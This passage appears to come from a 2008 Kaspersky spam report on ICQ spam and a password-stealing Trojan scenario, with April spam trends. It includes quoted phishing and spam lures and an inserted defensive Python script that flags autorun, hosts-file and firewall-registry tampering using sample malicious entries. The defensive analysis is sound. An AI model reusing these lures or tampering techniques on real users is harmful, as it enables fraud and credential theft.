/&gt;&lt;br /&gt;Figure 5. Phishing message sent in an attempt to obtain an ICQ account password&lt;br /&gt;&lt;br /&gt;Hello, this is a message from the ICQ security system. An attempt &lt;br /&gt;has been made to steal your ICQ number. To prevent this in the future, it is &lt;br /&gt;recommended that you send your ICQ number and password for processing to &lt;br /&gt;our address administrat-icqo2008@rambler.ru. You will receive a reply &lt;br /&gt;within an hour. Thank you for using our system.&lt;br /&gt;Distinguishing characteristics of ICQ spam&lt;br /&gt;&lt;br /&gt;Unlike email, ICQ makes it possible to search for people based on the interests described in their user contact information. 
This makes it possible for cybercriminals to target specific audiences with their spam. It is fairly easy for spammers to get relevant data (in most cases, the ages and interests of users) and use it to gain the attention of spam recipients. &lt;br /&gt;&lt;br /&gt;Practically all spam messages come from UINs that are not on the user’s contact list. The number of unwanted messages received by a user in any given period of time depends on the UIN. Users with six-digit UINs receive an average of 15 to 20 unwanted messages every hour, many of which contain links to Trojan-PSW.Win32.LdPinch. Users with nine-digit numbers that have nothing special about them receive an average of 10 to 14 such messages every day, while users with 'attractive' numbers get 2 to 2.5 times more spam. &lt;br /&gt;&lt;br /&gt;In terms of message subjects, ICQ spam significantly differs from email spam. While about 90% of email spam advertises various goods and services, the proportion of such advertising in ICQ spam is less than 13% (the total share of the Illegal Services, Computer Services, Mobile Spam and Medical Spam categories), with Illegal Services (5.45%) being the largest of all the categories offering services.&lt;br /&gt;&lt;br /&gt;On the whole, entertainment-related subjects predominate in ICQ spam. The reason for this is that ICQ is rarely used for business communication, while most of its users are young people. Spammers take the interests of their target audience into account: ICQ spam is dominated by invitations to visit entertainment sites and by ‘adult’ advertisements. Spam in the Computer Games, Voting and Mobile Spam categories also targets young people. On the whole, young people are targeted by about 50% of all spam messages. &lt;br /&gt;&lt;br /&gt;The low share of ‘medical’ spam (traditionally a leading category in email spam) is also determined by the target audience. In ICQ spam, the share of this category is below 1%. 
Apparently, ICQ users do not respond to advertising for medical goods and services the way email users do. &lt;br /&gt;&lt;br /&gt;Distinguishing characteristics of ICQ spam:&lt;br /&gt;&lt;br /&gt;Targets a young audience. &lt;br /&gt;Overall bias towards entertainment. &lt;br /&gt;Virtually no advertising of consumer goods. Exceptions are offers for mobile phones and pharmaceuticals, as well as a small number of messages which fall into the category of Other Spam. &lt;br /&gt;Relatively high percentage (8.17%) of messages related to ICQ itself. &lt;br /&gt;Significant proportion (5.45%) of messages offering illegal services. The most popular offers are email and ICQ hacking, counterfeit documents, credit card hacking. &lt;br /&gt;An attack scenario&lt;br /&gt;The user launches a file downloaded using a link received via ICQ, but the photo promised by the spammer never shows up on the screen. The user waits for a minute or two, and in the meantime the Trojan searches the computer for passwords stored on it. Some of the passwords are encrypted, but they can be easily decrypted by the cybercriminal. Then the Trojan collects all the passwords found and creates an email message containing all the confidential information collected. The message is sent to the cybercriminal’s email address, which was created a couple of days prior to the attack. To prevent the Windows firewall from warning the user of the danger, the Trojan disables the firewall by modifying the relevant registry key. The Trojan also takes similar action against other programs that could prevent it from stealing passwords and other important information from the user. Finally, the malicious program creates a .bat file that deletes both the Trojan and itself, thereby destroying any traces of malicious activity. 
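&lt;br /&gt;&lt;br /&gt;An added example, not from the original article or from Kaspersky Lab: three checks for the host-side tampering described in this scenario and in the QQPass/Skipi paragraph earlier, written as plain Python over copies of the artefacts so they run anywhere. The first parses an autorun.inf and reports launch keys (open, shellexecute, shell\verb\command) that point at an executable on the media; the second reports hosts-file entries that pin update or vendor domains to any address; the third reads a regedit export of the FirewallPolicy key and reports profiles with EnableFirewall set to 0. The article does not name the registry value the Trojan modifies; EnableFirewall under the XP SP2 FirewallPolicy profile keys is the one this example assumes. The sample autorun.inf, hosts file and .reg export, including every file name, domain and value in them, are constructed for the example.&lt;br /&gt;&lt;br /&gt;

```python
import re
from configparser import ConfigParser, Error as IniError

# --- constructed samples: file names, domains and values are illustrative ---
SAMPLE_AUTORUN_INF = """[autorun]
open=RECYCLER\\setup.exe
shellexecute=RECYCLER\\setup.exe
shell\\Open\\command=RECYCLER\\setup.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

SAMPLE_HOSTS = """127.0.0.1 localhost
::1 localhost
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 update.microsoft.com   # added by malware
0.0.0.0 liveupdate.symantec.com
"""

# A regedit export of the XP SP2 firewall policy profiles (assumed key location).
SAMPLE_REG_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile]
"EnableFirewall"=dword:00000000
"DoNotAllowExceptions"=dword:00000000

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile]
"EnableFirewall"=dword:00000001
"""

EXEC_EXT = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js|wsf)\b", re.I)

def autorun_launch_entries(text):
    """Keys in an autorun.inf that would run a program from the media."""
    cp = ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str            # keep key case as written
    try:
        cp.read_string(text)
    except IniError:
        return [("parse-error", "")]
    if not cp.has_section("autorun"):
        return []
    hits = []
    for key, value in cp.items("autorun"):
        k = key.lower()
        # open=/shellexecute= fire on insertion when AutoRun is on;
        # shell\verb\command= hijacks Explorer's context-menu verbs (Open, Explore).
        runs = k in ("open", "shellexecute") or (k.startswith("shell\\") and k.endswith("\\command"))
        if runs and EXEC_EXT.search(value):
            hits.append((key, value))
    return hits

WATCHED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "kaspersky.com", "symantec.com")

def hosts_redirections(text):
    """hosts entries that pin update/vendor domains to any address. Loopback or
    0.0.0.0 blocks updates; any other address hands the traffic to the attacker,
    so every such entry is reported."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            host = name.lower()
            if host != "localhost" and host.endswith(WATCHED_SUFFIXES):
                hits.append((addr, host))
    return hits

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"(.+)"=dword:([0-9a-fA-F]{8})$')

def firewall_disabled_profiles(reg_export):
    """Profiles under FirewallPolicy whose EnableFirewall value is 0 in a .reg export."""
    disabled, current = [], None
    for line in reg_export.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = DWORD_RE.match(line)
        if m and current and "\\FirewallPolicy\\" in current:
            name, value = m.group(1), int(m.group(2), 16)
            if name.lower() == "enablefirewall" and value == 0:
                disabled.append(current.rsplit("\\", 1)[-1])
    return disabled

if __name__ == "__main__":
    print("autorun:", autorun_launch_entries(SAMPLE_AUTORUN_INF))
    print("hosts:", hosts_redirections(SAMPLE_HOSTS))
    print("firewall off:", firewall_disabled_profiles(SAMPLE_REG_EXPORT))
```

On a live machine the same three functions can be fed the real files: autorun.inf from the root of each removable drive, %SystemRoot%\system32\drivers\etc\hosts, and the output of regedit /e for the FirewallPolicy key.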
&lt;br /&gt;&lt;br /&gt;By the time a user begins to suspect that something suspicious is going on, the hacker will have processed tens or hundreds (depending on the mailing size) of messages with passwords sent by the Trojan. Incidentally, many users remain unaware that any malicious activity has taken place at all. In any case, the only evidence the user has is a link to a non-existent photo, so the chances of tracing the cybercriminal are very slim. &lt;br /&gt;&lt;br /&gt;Users often console themselves by saying they had nothing of importance on their computers anyway. But a hacker or cybercriminal wouldn't agree: s/he now has an impressive list of passwords to email accounts, FTP clients and online games, as well as the user’s bank account and, yes, the ICQ account itself. &lt;br /&gt;&lt;br /&gt;You could ask why the hacker might need one more nine-digit number that nobody knows. This is why: s/he will enter the password in their ICQ client and gain access to the user’s contact list. A message will then be sent to all users on the contact list asking them to lend 50 e-dollars and promising to repay the debt the next day. The rest will depend on the recipients’ generosity and their relationship with the user whose account has been stolen. Usually, it is not too difficult to persuade a hesitant user to oblige. At the same time, the hacker will be chatting to other users on the contact list, trying to persuade them to pay up as well. Even if only one person on every victim’s contact list agrees to pay the virtual money to the hacker, the latter will receive a considerable amount of money comparable to the daily wages of a good programmer or even more – all for an hour of chatting. &lt;br /&gt;&lt;br /&gt;What about the FTP account? What will happen if the FTP server to which the cybercriminal gained access using the stolen password stores the web pages belonging to a sufficiently popular website? 
The cybercriminal will be able to add a simple iframe or encrypted JavaScript code at the end of each web page, which will surreptitiously download and launch a malicious program to all computers used to view the site. &lt;br /&gt;&lt;br /&gt;All the actions described above are easy to automate. A cybercriminal can easily find ICQ UINs to send spam to on numerous dating sites and forums. More precisely, this will be done by a special program that does all the routine work, including filtering out duplicate numbers and checking the spam list for inactive numbers. Then the hacker will upload a Trojan to a website registered with a free hosting service and will send a link to the website using the spam list created by the hacker’s software. After this, another program will sort the numerous messages sent by the Trojans launched on victim computers and categorize the passwords received. The list of new ICQ numbers received from the Trojan will be converted to a new spam list. If an infected user’s ICQ number turns out to be attractive (i.e., easy to remember), it can be sold later for a large amount of money. And then the final stage – sending messages with convincing requests to lend a little money. If a reply to the request is received, it's time for the hacker to get involved and use his or her knowledge of psychology and social engineering techniques. After this, the ‘hijacked’ numbers can be sold wholesale to spammers. The process described above may sound like fiction, but in actual fact, such schemes are quite common. &lt;br /&gt;&lt;br /&gt;To summarize, here's a list of why cybercriminals attack IM clients:&lt;br /&gt;&lt;br /&gt;Selling stolen ICQ numbers (nine-digit numbers are sold wholesale and ‘attractive’ numbers are sold individually for significant amounts of money). &lt;br /&gt;Creating spam lists for sale to spammers or for mass distribution of malicious programs. &lt;br /&gt;Using the contact lists of victims as trusted sources to ‘borrow’ money. 
&lt;br /&gt;Downloading malicious programs using software vulnerabilities. &lt;br /&gt;Changing the web pages of legitimate sites (using FTP server passwords) to download malicious software to visitors’ computers. &lt;br /&gt;Creating botnets or extending existing zombie networks. &lt;br /&gt;Other malicious activity. &lt;br /&gt;Counteracting attacks on IM systems&lt;br /&gt;What can users do against such sophisticated and relentless attacks? Defend themselves, naturally! Below is advice to help readers protect themselves against threats that spread via IM clients. &lt;br /&gt;&lt;br /&gt;First of all, be careful and do not click thoughtlessly on links in received messages. Listed below are several types of messages that users should view with extreme caution: &lt;br /&gt;&lt;br /&gt;Messages received from unknown users with strange nicknames (such as SbawpathzsoipbuO). &lt;br /&gt;Messages from users on your contact list which ask you to take a look at new photos which have an .exe file extension. &lt;br /&gt;Messages that allegedly contain sensational news of an affair between two celebrities with “a report from the scene”. The ‘report’ in this case is usually a link to the following file: http://www.******.com/movie.avi.exe. It is highly likely that this link will lead to Trojan-PSW.Win32.LdPinch. &lt;br /&gt;Messages suggesting that the user download a program which will provide new opportunities, e.g. “NEW BUG in ICQ enabling you to create any number that does not exist”. A link in the message will no doubt lead to a program, but that program will steal the user’s UIN rather than create a new account number. &lt;br /&gt;Such messages should simply be ignored. &lt;br /&gt;&lt;br /&gt;If a message comes from a user you know, find out whether they really sent it. And of course, do not download a file with an .exe extension and launch it. 
Even if the file extension is not specified in the link, you could be redirected to another page that contains malicious software. &lt;br /&gt;&lt;br /&gt;As always, users should observe the elementary rules of ‘computer hygiene’: an antivirus product with up-to-date databases and a firewall which blocks unauthorized network connections should be installed on the computer. It is a good idea for the antivirus product to include proactive protection that detects malicious programs based on their behavior and/or a heuristic analyzer. &lt;br /&gt;&lt;br /&gt;Users are often unaware of the fact that a malicious program has been run on their computer. Friends or contacts may provide clues to the fact that the PC has been infected. One example would be a friend asking “Why did you ask me to lend you 50 WebMoney units yesterday when we chatted on ICQ?” when the real owner of the ICQ account did no such thing. Another, even more obvious, indication of an infection is a fruitless attempt to use the login or password for a service: unsuccessful authorization attempts mean that the password has been changed. By whom? Either by the official service provider or by a cybercriminal. In the first case the user will receive either a new password or a notification that the password has been changed, via email or some other means. If a cybercriminal is to blame, this will not happen.&lt;br /&gt;&lt;br /&gt;What should be done if a Trojan has delivered its malicious payload and then deleted itself from the computer? First of all, make sure the computer really is clean by scanning it with an antivirus program. Then change any passwords the Trojan may have stolen, if possible. To do this, try to remember which programs require passwords and try to enter these passwords. If your attempt is successful, change the password immediately. 
It also makes sense to send the relevant alert to all users on your contact list and ask them not to respond to requests sent from your IM account asking to borrow money, and not to attempt to view photos by following links sent in an IM message. &lt;br /&gt;&lt;br /&gt;Installing the latest version of ICQ downloaded from the official ICQ website can help to prevent execution of arbitrary code on the system that is made possible by an ICQ 6.x vulnerability related to processing HTML code. &lt;br /&gt;&lt;br /&gt;You can take the following steps to protect yourself from ICQ spam. &lt;br /&gt;&lt;br /&gt;Since spammers can check a user’s ICQ status using a website, it makes sense to block this feature in your ICQ client. Spam mailings usually target users who actively chat on ICQ or at least are always online. Therefore, it’s best to remain in invisible mode whenever possible. However, some programs can tell other users whether you are actually offline or just invisible. In this situation, you can use an anti-spam bot – a simple module supported by some IM clients (such as QIP). The screenshot below shows the configuration of a simple anti-spam bot. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 6. Configuration of a simple anti-spam bot &lt;br /&gt;&lt;br /&gt;How does an anti-spam bot work? If a user who is not in your contact list wants to chat to you, they will have to answer a question before they can start chatting. They will not be able to send you any messages until the question is answered. It is a good idea to use questions that everyone knows the answers to, such as “how much is 2+2*2?” or “what is the name of our planet?” If the user writes “6” or “Earth” respectively and sends the message, they will then be allowed to send you further messages. 
This protection is relatively successful at blocking a range of bots that send spam, although some of these bots may be intelligent enough to answer the most popular questions, e.g., the default questions used in protection modules. &lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;Instant messaging programs are very attractive to malicious users of all kinds, and because of this the problem of malware distribution via IM clients is serious. New versions of IM clients contain as yet unknown vulnerabilities, which can be identified first by hackers and only afterwards by program developers. Such situations can easily lead to mass epidemics. Some users are also extremely tired of getting unwanted messages (IM spam). &lt;br /&gt;&lt;br /&gt;Currently, there are no methods or solutions designed specifically to protect IM clients. However, observing the simple rules of ‘computer hygiene’, and using a well-configured anti-spam bot combined with a healthy dose of common sense can help users enjoy worry-free chat via the Internet. &lt;br /&gt;&lt;br /&gt;Evolution of spam&lt;br /&gt;&lt;br /&gt;Spam in mail traffic&lt;br /&gt;Spam in mail traffic averaged 86.2% in April 2008. A low of 68.6% was recorded on 28 April, while a high of 93.9% occurred on 9 April. The share of graphical spam declined considerably in April compared to March and was only 13%.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Spam by category&lt;br /&gt;In April the top five leading spam categories remained unchanged from the previous month:&lt;br /&gt;&lt;br /&gt;Medications, health-related goods and services (16.4%) &lt;br /&gt;Education (15.6%) &lt;br /&gt;Fake designer watches (11.6%) &lt;br /&gt;Travel and tourism (9.8%) &lt;br /&gt;Computers and the Internet (4.3%) &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The Medications, health-related goods and services category maintained its leading position. 
The lion’s share of spam in this category is English-language adverts for viagra, which is so popular because no prescription is required to buy it (viagra is classified as a prescription drug in a number of countries). In Russia, however, viagra is freely available at any drug store, so Russian-language adverts for it are rare.&lt;br /&gt;&lt;br /&gt;An interesting new trend in April, therefore, was the appearance of Russian-language spam advertising viagra. The text of the message was translated from an English-language version. The site mentioned in the advertisement by the spammers included the caveat “Generic viagra for sale here”, which continued: “exact copy of the world’s most famous medication for male erectile dysfunction”. The fact that Russian consumers are only really attracted by low prices meant the mailing was short-lived.&lt;br /&gt;&lt;br /&gt;П.робл.е.ма. п.овышения потенци.и вст.ала в посл.еднее время особен.но остро не то..лько д.ля му.жчин .ста.рше 60-ти лет, но и д.ля 40 и 3.0-ле.тних му.жчин. По данн.ым Всемирной Организации Здравоохранения каждый десятый му.жчина ст.арше 2.1 года с.тра.дает по.ниже.нной по.тенцией, а каждый третий мужчина с.тарше 60 лет не спо.собе.н на половой акт. По.ниженн.ую п.от.енцию. можно. лечи.ть! В этом в.ам поможет всемирно и.звес.тн.ый п.репарат Виагр.а .В отли.чие от других с.по.собов .леч.ен.ия. эрек.тил.ьной .дис.функц.ии,. котор.ые .пре..ду.см.атривают .проведение уко.лов в .пол.ов.ой чл.ен или другие медицинские про.цед..уры, Виа.г.ра является прост.ым, удобным. и лег.ко .прим.еняемым пр.епар.атом. При. ис.пользовании "Виагры." Вы .просто принимает.е одну таблетку тогда, к.огда план..ируете сексуальны.й контакт Пре.им.ущ.ества .В.иагры - Эффективна у 91.% .мужчин, в отличи.е о.т а.нало.гов, та.ких как Сеалекс,. Им.паза, Вука..-Ву.ка - Де.йствует в .теч.ении. 
6 часов после пр.иема - Действует на естественные ме.хани.змы возникновения э.рек.ции - Применяется у м.уж.чин, страдающи.х эректильной дисфу.нкцией ра.зли.чно.го п.роисхожде.ния (сосудистые, не.рвн.ые р.асст.ройс.тва эре.кции) - Пр.ин.имает.ся н.епос.редстве.нно пере.д половым ак.том - Практически не. им.еет п.обочн.ых эффект.ов Приобрести этот пр.епарат .можно зд.есь&lt;br /&gt;A Russian-language advert for viagra. The body of the text is interspersed with full stops that break up the individual words.&lt;br /&gt;&lt;br /&gt;As the school year draws to an end, spammers actively exploited the theme of school leaving exams and higher education entry exams, keeping the Education category in second place. Another popular theme was the option of avoiding entry exams altogether.&lt;br /&gt;&lt;br /&gt;У Вас осталось полтора месяца чтобы поступить на дистанционное обучение БЕЗ ЕГЭ! &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;According to Russian legislation, the results of school-leaving exams are only valid for a year. Entering a higher educational institution after that period means the exams have to be passed once again. The advert above offers a way of avoiding repeat exams: a certificate with the required pass results can be obtained by simply signing up for a distance-learning course and paying a “fee”. Those interested in the offer are told to hurry and apply before June 10, 2008, and also to tell their friends. &lt;br /&gt;&lt;br /&gt;Spam messages offering fake designer goods remained in third place. The sale of replica goods also took on an unexpected “political” slant. In the run up to the inauguration of Russia’s new president, spam messages started offering “A watch like Putin’s”. A cheap copy of the outgoing president’s chronometer was not the only thing on offer: lots of other goods of a similar “quality” were also available. &lt;br /&gt;&lt;br /&gt;Часы как у Путина Легендарные часы Раtek Рhilippе В.В.Путина!!! Всего за 325 евро (реплика)! 
Ты хочешь походить на Президента, но не переплачивать 50000 евро? &lt;br /&gt;Это возможно, причем реплики не уступают оригиналам ни по качеству ни по внешнему виду. Сравните сами: &lt;br /&gt;Часы Patek Philippe Perpetual Calendar (часы В.В.Путина) &lt;br /&gt;Страна производитель: оригинал - Швейцария, реплика - Бельгия&lt;br /&gt;Стоимость: оригинал - 53000 евро, реплика - 325 евро. &lt;br /&gt;Механизм: оригинал - Швейцария, реплика - Швейцария. &lt;br /&gt;Срок службы: оригинал - 10 лет, реплика - 6 лет. &lt;br /&gt;Гарантия: оригинал - 24 месяца, реплика - 18 месяцев&lt;br /&gt;. Удобство покупки: оригинал - 2 бутика в России, в Москве. Реплика - бесплатная доставка в любой город России (страны СНГ). &lt;br /&gt;Внешнее сходство: реплика на 100% идентична оригиналу! &lt;br /&gt;Ознакомьтесь {LINK}&lt;br /&gt;тел. 8-800-2000-720 (звонок из России - бесплатный) &lt;br /&gt;Кроме того в Интернет магазине {LINK} в продаже ещё более 189 часов &lt;br /&gt;престижнейших мировых марок: &lt;br /&gt;Rado (от 299 евро), Rolex (от 325 евро), Omega (от 242 евро), Vacheron Constantin (до 1749 евро), Breguet (от 449 евро), Cartier (от 229 евро)! &lt;br /&gt;юмфм фдтхю вг фла ц аа дбцяа щгд&lt;br /&gt;эвх дажжд гюбч тцмяг&lt;br /&gt;ыу црфщи жеюпу г шж б рояшь ц&lt;br /&gt;ияфп зш э новкп&lt;br /&gt;сюшшо м бшв р угещь&lt;br /&gt;ьвл тгжну зштив хвцвл&lt;br /&gt;у лош дфвыя прв илл &lt;br /&gt;Translation:&lt;br /&gt;&lt;br /&gt;A watch like Putin’s The legendary Patek Philippe watch of V.V. Putin!!! For just 325 euros (replica)! You want to look like the President, but don’t want to pay 50000 euros? &lt;br /&gt;Now it’s possible, and the replica is no different from the original in terms of both quality and looks. Compare for yourself: &lt;br /&gt;Patek Philippe Perpetual Calendar watch (the watch of V.V. Putin) &lt;br /&gt;Made in: original – Switzerland, replica - Belgium&lt;br /&gt;Cost: original – 53000 euros, replica – 325 euros. 
&lt;br /&gt;Mechanism: original – Switzerland, replica – Switzerland. &lt;br /&gt;Service life: original – 10 years, replica – 6 years. &lt;br /&gt;Guarantee: original – 24 months, replica – 18 months. &lt;br /&gt;Convenient purchase: original – 2 boutiques in Moscow, Russia. Replica – free delivery to any town in Russia (CIS). &lt;br /&gt;External appearance: replica is 100% identical to the original! &lt;br /&gt;See here {LINK}&lt;br /&gt;Tel. 8-800-2000-720 (free calls from Russia). &lt;br /&gt;There are also more than 189 watches of famous international brands at the Internet store {LINK}&lt;br /&gt;Rado (from 299 euros), Rolex (from 325 euros), Omega (from 242 euros), Vacheron Constantin (up to 1749 euros), Breguet (from 449 euros), Cartier (from 229 euros)! &lt;br /&gt;юмфм фдтхю вг фла ц аа дбцяа щгд&lt;br /&gt;эвх дажжд гюбч тцмяг&lt;br /&gt;ыу црфщи жеюпу г шж б рояшь ц&lt;br /&gt;ияфп зш э новкп&lt;br /&gt;сюшшо м бшв р угещь&lt;br /&gt;ьвл тгжну зштив хвцвл&lt;br /&gt;у лош дфвыя прв илл&lt;br /&gt;&lt;br /&gt;SMS fraud&lt;br /&gt;More and more spam with offers to pay for goods and services via SMS messages sent to short numbers is appearing on the Russian Internet. Even if the spam message states that the SMS is free of charge, it doesn’t mean it actually is. There is also no guarantee that the user will get what he wanted and that his money won’t just end up lining the pocket of a cybercriminal.&lt;br /&gt;&lt;br /&gt;Spammers continue to use Mail.ru logos to make their messages look more respectable. The message below deliberately promotes a dating service because it entails further communication and new contacts. These types of messages usually include an attractive photo, and only mention further down the page that you have to pay to communicate. 
The very fact that the service is not free should arouse suspicion.&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt; &lt;br /&gt;Вам оставлено сообщение на мобильном портале Mail.ru, пользователем &lt;Виктория SexyGirl&gt;&lt;br /&gt;Для прочтения сообщения, отправьте смс со словом tt456734 на номер 4449&lt;br /&gt;Услуга доступна для жителей РФ и граждан СНГ, стоимость услуги 0.3$ + НДС)&lt;br /&gt;Сообщение отправлено 26.04.2008&lt;br /&gt;Спасибо за то, что Вы являетесь пользователем Mail.Ru.&lt;br /&gt;С уважением, администрация Mail.Ru (1518450363)&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Translation: &lt;br /&gt;&lt;br /&gt;Znakomstva@mail.ru&lt;br /&gt;&lt;br /&gt;You have got a message on mail.ru from &lt;br /&gt;&lt;br /&gt;To read the message send an SMS with the text tt456734 to 4449 (the service is available in the Russian Federation and CIS, the charge is $0.3 including VAT)&lt;br /&gt;&lt;br /&gt;The message was sent on April 26, 2008&lt;br /&gt;&lt;br /&gt;Thank you for using mail.ru&lt;br /&gt;&lt;br /&gt;Administration of mail.ru (1518450363) &lt;br /&gt;&lt;br /&gt;Today, even the financial pyramid schemes that used to offer the opportunity of huge online earnings only send out information after receiving an SMS message. For the cost of an outgoing message (5 rubles, or about 20 cents) the user contributes to a business named MLM. It goes without saying that a spammer who promises the recipient “earnings” with no initial investment can hardly be trusted.&lt;br /&gt;&lt;br /&gt;посмотри не пожалеешь&lt;br /&gt;&lt;br /&gt;Отправьте на номер 7030 SMS следующего содержания: код+25558 Стоимость отправки сообщения в рублях: 5 В ответ вы получите ссылку на сайт с заработком,без вложений, и практически без вашего участия. &lt;br /&gt;&lt;br /&gt;Translation: &lt;br /&gt;&lt;br /&gt;This is worth seeing&lt;br /&gt;&lt;br /&gt;Send an SMS message to 7030 with the code +25558. An SMS message costs 5 rubles. 
In return you will get a link to the site containing information on how to get money without any investments and with minimal participation. End of translation.&lt;br /&gt;&lt;br /&gt;Solutions from spammers: protecting against viruses and spam&lt;br /&gt;On the eve of the 30th anniversary marking the first spam message sent via email, users were being offered equipment not only for sending spam but also to protect against it. &lt;br /&gt;&lt;br /&gt;Sympathetic-sounding mass mailings with the theme “Tired of spam? Call us!!!” promoted nothing other than anti-spam and antivirus products from the German company Avira. It is unclear whether this was just another case of black PR, or the Russian representatives of Avira using unorthodox methods to advertise the services of Avira’s dealers in Russia. &lt;br /&gt;&lt;br /&gt;In April, Russian-language spam promoting anti-virus products added to the usual English-language advertisements for very cheap software. The main difference was that the Russian-language spam was offering the programs for free. &lt;br /&gt;&lt;br /&gt;Users should be particularly careful when downloading “antivirus” files from unknown sources, because they may turn out to be malicious programs. &lt;br /&gt;&lt;br /&gt;Kaspersky Key 5 6 7 Ключ Касперский 5 6 7 &lt;br /&gt;&lt;br /&gt;Ключ Касперский 5 до 9_03_2010 бесплатно &lt;br /&gt;&lt;br /&gt;Ключ Касперский 6 до 11_03_2010 бесплатно &lt;br /&gt;&lt;br /&gt;Ключ Касперский 7 бесплатно &lt;br /&gt;&lt;br /&gt;специально для ХХХХХХХХХХХХХХ &lt;br /&gt;&lt;br /&gt;на {site} &lt;br /&gt;&lt;br /&gt;Kaspersky 5 Key do 9_03_2010 Besplatno &lt;br /&gt;&lt;br /&gt;Kaspersky 6 Key do 11_03_2010 Besplatno &lt;br /&gt;&lt;br /&gt;Kaspersky 7 Key Besplatno &lt;br /&gt;&lt;br /&gt;spetsial'no dlya ХХХХХХХХХХХХХХХ na {site} &lt;br /&gt;&lt;br /&gt;If earlier spammers offered the option of unsubscribing from unsolicited mailings, the latest trick is the option of unsubscribing by phone. 
This method is hardly likely to eradicate spam, and if anything will ensure it continues: by phoning, a user is merely confirming an email account is active and ensures that the address remains in illegitimate mailing databases. &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;We help you to launch your business&lt;br /&gt;&lt;br /&gt;Legal company “Consultant” offers the following types of legal services:&lt;br /&gt;&lt;br /&gt;Registration of LLC, CJSC, OJSC &lt;br /&gt;Registration of individual business &lt;br /&gt;Registration of equity issue &lt;br /&gt;Legal addresses &lt;br /&gt;Registration of non-commercial organizations &lt;br /&gt;Amendments to constitutive documents &lt;br /&gt;Copies of extracts from the Uniform State Register of Enterprises and Organizations &lt;br /&gt;Consultation on stockholder rights &lt;br /&gt;On demand drafts of constitutive documents &lt;br /&gt;Holding of stockholder meetings &lt;br /&gt;Corporate disputes &lt;br /&gt;Major transaction support &lt;br /&gt;Legal entity dissolution &lt;br /&gt;Bookkeeping assistance &lt;br /&gt;Drafting and expertise of all types of civil documents &lt;br /&gt;Special offer: preparation of documents to be presented in internal revenue service – 1500 rub.&lt;br /&gt;&lt;br /&gt;Discount for complex order!&lt;br /&gt;&lt;br /&gt;Contact information (495) 951-32-05 783-72-66&lt;br /&gt;&lt;br /&gt;If you opened this e-mail, you may need legal advice. If you opened this e-mail by chance and you do not need any legal assistance, please, delete this message. You can unsubscribe from mass mailings by calling 951-32-05 and stating your e-mail address. &lt;br /&gt;&lt;br /&gt;Spammer methods and tricks&lt;br /&gt;In order to bypass filtration systems, spammers are willing to modify texts to such an extent that they become unreadable. The flow of spam in April was marked by a wave of messages containing heavily disguised telephone numbers. 
As seen from the example below, the figures are interspersed with letters, which change from message to message. This method did not gain popularity, however, because only those really interested in the topic would be patient enough to work out the exact telephone number. By the end of the month the technique had already disappeared from the flow of spam.&lt;br /&gt;&lt;br /&gt;Английский язык. &lt;br /&gt;&lt;br /&gt;Уроки с автором методики &lt;br /&gt;&lt;br /&gt;Вы сможете даже думать на английском языке (правда, если будете к этому серьезно относиться) Поймете грамматику. Не думайте, что у вас «тяжелый случай». Начните заниматься. Преподаватель может выехать к вам. &lt;br /&gt;&lt;br /&gt;Один академический час стоит – 90$ (45 минут) У вас есть возможность получить бесплатную консультацию. (495) xxx-xx-xx&lt;br /&gt;&lt;br /&gt;Translation: &lt;br /&gt;&lt;br /&gt;English. &lt;br /&gt;&lt;br /&gt;Lessons with methodologist&lt;br /&gt;&lt;br /&gt;You can even think in English (if you really make an effort) Understand grammar. No need to think you’re a hopeless case! Start learning. A teacher can come to you. One academic hour costs $90 (45 minutes) You can get a free consultation. &lt;br /&gt;&lt;br /&gt;(495) xxx-xx-xx &lt;br /&gt;&lt;br /&gt;One new method of obfuscating text is to replace random letters in links with special UTF codes. Each letter in the UTF code corresponds to a certain set of symbols. When sending messages containing one and the same link, spammers replace different letters with codes in each individual message. Because spam filters work with the original message, they do not recognize the link and, subsequently, that the messages belong to the same mass mailing. A mail client then converts the codes into the corresponding letters, meaning the user never notices any of the changes made. &lt;br /&gt;&lt;br /&gt;How the original message looks&lt;br /&gt;&lt;br /&gt;Summer is coming and it will soon be time to head to the beach. 
&lt;br /&gt;&lt;br /&gt;It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://e%73g%78uvj.info&lt;br /&gt;&lt;br /&gt;The message that the recipient sees&lt;br /&gt;&lt;br /&gt;Summer is coming and it will soon be time to head to the beach. &lt;br /&gt;&lt;br /&gt;It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://esgxuvj.info/&lt;br /&gt;&lt;br /&gt;Russian-language mailings advertising sites in the .tk domain zone, which belongs to Tokelau, have resumed. Spammers use this free registration zone to create a large number of duplicate pages, thus increasing the chances of evading anti-spam systems. &lt;br /&gt;&lt;br /&gt;любви для тебя больше нет. Умерла она, твоя любовь. А вместо нее дадена тебе соляные фактории, а по берегам темных, глубоких речек, по большей части http://KNEWMYNAME.TK &lt;br /&gt;&lt;br /&gt;Приезжали посмотреть на наши чудеса из столиц и иных краев, хотели и в черную дыру, смотревшую ему прямо в переносицу. Сухо щелкнул курок, потом http://KIRKUSH.TK&lt;br /&gt;&lt;br /&gt;Two links that 